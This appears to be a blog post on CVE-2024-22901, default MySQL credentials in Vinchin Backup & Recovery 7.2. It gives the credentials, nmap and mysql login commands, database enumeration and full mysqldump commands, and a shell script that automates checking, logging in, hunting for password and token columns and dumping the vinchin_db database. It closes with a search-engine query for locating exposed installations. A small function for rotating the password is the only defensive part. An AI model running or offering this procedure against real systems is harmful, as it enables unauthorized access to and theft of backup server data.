CVE-2024-22901

Default MYSQL Credentials in Vinchin Backup & Recovery

"A critical security issue, identified as CVE-2024-22901, has been discovered in Vinchin Backup & Recovery version 7.2. The software has been found to use default MYSQL credentials, which could lead to significant security risks. Vinchin has not addressed previous disclosures, including CVE-2022-35866, and has not patched the reported vulnerabilities. The presence of these unresolved issues, now compounded by the newly discovered vulnerability of default MYSQL credentials, opens up potential avenues for easy unauthenticated Remote Code Execution (RCE). This lack of response is alarming for a product that is certified in cybersecurity and poses a considerable risk to its users." -seclists.org

There is not much to say: the username is vinchin and the password is yunqi123456. The MySQL server listens on the default port 3306; to check whether that port is open on a target, run nmap: nmap -p 3306 [IP address]. You can connect with the standard mysql command-line client (the mysql binary shipped in the mysql-client or mariadb-client package): mysql -h [host] -u vinchin -pyunqi123456. Two things have to hold for this to work: the MySQL service must be reachable over the network (the nmap check covers that), and the vinchin account must be allowed to log in from a remote host (the login attempt itself tells you).
[*] commands.png
If you don't know the SQL language, click here.
[#] select * from information_schema.tables; lists every table of every database the account can see (information_schema is the server's catalog).
[#] show databases; lists all databases; there is always a "vinchin_db".
[#] use [db name]; selects the database to work in.
[#] show tables; after selecting a database, lists its tables.

Downloading the database. With the mysqldump tool, also included in the mariadb package, we can download a single database or all of them. To download one database, run: mysqldump -h [host] -u vinchin -pyunqi123456 [db name] --result-file=dump.sql
To download every database, replace the database name with the --all-databases option: mysqldump -h [host] -u vinchin -pyunqi123456 --all-databases --result-file=dump.sql
A full dump takes a while. More detailed mysqldump documentation can be found here.
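The whole procedure above (port check, login with the default credentials, enumeration, dump) wrapped into one script, as an added example that is not part of the original post and not Vinchin's code. It goes a little beyond the post: the password is passed through a temporary 0600 defaults file instead of on the command line (where -pyunqi123456 lands in ps output and shell history), the nmap result is parsed from grepable output rather than eyeballed, the enumeration looks for credential-like column names in vinchin_db (the LIKE patterns are guesses, not knowledge of the schema), and mysqldump runs with --single-transaction so the dump is a consistent InnoDB snapshot that does not lock the backup server's tables. It assumes nmap, mysql and mysqldump are installed; the harden_sql function emits the statements a defender would run to rotate the password and takes the exact 'user'@'host' pair as an argument because the host part of the account is not stated on the page.

```shell
#!/bin/sh
# vinchin_mysql_check.sh  -  added example, not from the original post.
# Usage: ./vinchin_mysql_check.sh <host> [dump.sql]

DB_USER=vinchin          # default credentials reported for Vinchin B&R 7.2
DB_PASS=yunqi123456

# Return 0 if nmap's grepable output (-oG) shows 3306 open.
nmap_reports_open() {
    printf '%s\n' "$1" | grep -q '3306/open/tcp'
}

# Write a private [client] defaults file and print its path, so the
# password never appears in argv or in the shell history.
write_client_cnf() {
    f=$(mktemp) || return 1
    chmod 600 "$f"
    printf '[client]\nuser=%s\npassword=%s\n' "$DB_USER" "$DB_PASS" > "$f"
    printf '%s\n' "$f"
}

# Run one SQL statement; --defaults-extra-file must be the first option.
mysql_q() {   # $1 host, $2 sql
    mysql --defaults-extra-file="$CNF" -h "$1" --batch --skip-column-names -e "$2"
}

# Table sizes (table_rows is an estimate for InnoDB) and columns whose
# names suggest stored secrets. The name patterns are assumptions.
enumerate_db() {   # $1 host
    mysql_q "$1" "SELECT table_name, table_rows FROM information_schema.tables
                  WHERE table_schema='vinchin_db' ORDER BY table_rows DESC;"
    mysql_q "$1" "SELECT table_name, column_name FROM information_schema.columns
                  WHERE table_schema='vinchin_db'
                    AND (column_name LIKE '%pass%' OR column_name LIKE '%secret%'
                         OR column_name LIKE '%token%' OR column_name LIKE '%key%');"
}

# Consistent snapshot dump of one database without table locks.
dump_db() {   # $1 host, $2 database, $3 output file
    mysqldump --defaults-extra-file="$CNF" -h "$1" --single-transaction "$2" --result-file="$3"
}

# Defender side: statements to rotate the default password. $1 is the
# exact account as listed in mysql.user, e.g. 'vinchin'@'%'; $2 the new password.
harden_sql() {
    printf "SELECT user, host FROM mysql.user WHERE user = 'vinchin';\n"
    printf "ALTER USER %s IDENTIFIED BY '%s';\nFLUSH PRIVILEGES;\n" "$1" "$2"
}

main() {
    host=$1; out=${2:-dump.sql}
    grepable=$(nmap -p 3306 -oG - "$host") || { echo "nmap failed" >&2; return 1; }
    nmap_reports_open "$grepable" || { echo "3306 not open on $host"; return 1; }
    CNF=$(write_client_cnf) || return 1
    trap 'rm -f "$CNF"' EXIT
    if ! mysql_q "$host" 'SELECT 1;' >/dev/null 2>&1; then
        echo "default credentials rejected on $host"; return 1
    fi
    echo "default credentials accepted on $host"
    enumerate_db "$host"
    dump_db "$host" vinchin_db "$out" && echo "dumped vinchin_db to $out"
}

# Only run against a target when a host is given; sourcing the file just defines the functions.
if [ "$#" -gt 0 ]; then main "$@"; fi
```

If the login is rejected, the account is either patched or restricted to localhost; if the port is filtered rather than closed, a firewall sits in front of the server and the nmap parse deliberately treats that as "not open".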

Looking for vulnerable targets

For obvious reasons a bare MySQL service banner on port 3306 does not say which product sits behind it, let alone its users or databases, so instead we filter search-engine results by the title of the web login page. With the query web.title="Vinchin Backup & Recovery", Hunter reports hundreds of results.
[*] hunter_results.png